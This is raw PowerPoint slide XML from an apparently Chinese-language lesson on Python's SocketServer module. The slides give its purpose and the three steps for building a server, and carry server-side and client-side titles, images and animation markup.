            <a:off x="1397996" y="546496"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="椭圆 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397996" y="2573334"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3635375" y="581660"/>
            <a:ext cx="7048500" cy="1224942"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="982153"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="矩形 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="644571"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SocketServer模块简化了编写网络服务程序的任务。实现异步，支持多连接</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="矩形 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4188086"/>
              <a:ext cx="5839606" cy="293265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SocketServer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3635375" y="2573020"/>
            <a:ext cx="7574915" cy="2922694"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="2922456"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="矩形 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="2584874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1.创建一个request handler class（请求处理类），继承自BaseRequestHandler class并重写它的handle()方法，该方法将处理到的请求。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2.实例化一个server class对象，并将服务的地址和之前创建的request handler class传递给它。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3.调用server class对象的handle_request() 或 serve_forever()方法来开始处理请求。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4188086"/>
              <a:ext cx="5577467" cy="365730"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>总结用SocketServer创建一个服务的步骤：</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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p14:dur="9"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750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="125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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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63" presetClass="path" presetSubtype="0" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02774 1.11111E-6 L 0.1108 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6927" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="19" presetID="35" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 1.11111E-6 L 4.16667E-6 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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42" presetClass="path" presetSubtype="0" decel="30000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.875E-6 -0.03982 L 1.875E-6 0.14814 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="9398"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="42" presetClass="path" presetSubtype="0" accel="30000" decel="30000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.875E-6 -0.03982 L 1.875E-6 4.44444E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1991"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="28" presetID="16" presetClass="entr" presetSubtype="42" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="30"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bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="2" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="1" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="2"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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId1"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6510655" y="1217295"/>
            <a:ext cx="5469890" cy="4182813"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="1595062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="矩形 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="1257480"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1.创建一个request handler class（请求处理类），继承自BaseRequestHandler class并重写它的handle()方法，该方法将处理到的请求。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2.实例化一个server class对象，并将服务的地址和之前创建的request handler class传递给它。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3.调用server class对象的handle_request() 或 serve_forever()方法来开始处理请求。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4188086"/>
              <a:ext cx="5577467" cy="139478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>总结用SocketServer创建一个服务的步骤：</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1345565"/>
            <a:ext cx="5523865" cy="49815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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="125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P spid="36" grpId="2"/>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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId1"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8293089" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId1"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193915" y="1515745"/>
            <a:ext cx="4471035" cy="2786380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1345565"/>
            <a:ext cx="5523865" cy="4981575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623695" y="2997835"/>
            <a:ext cx="8437245" cy="8623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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
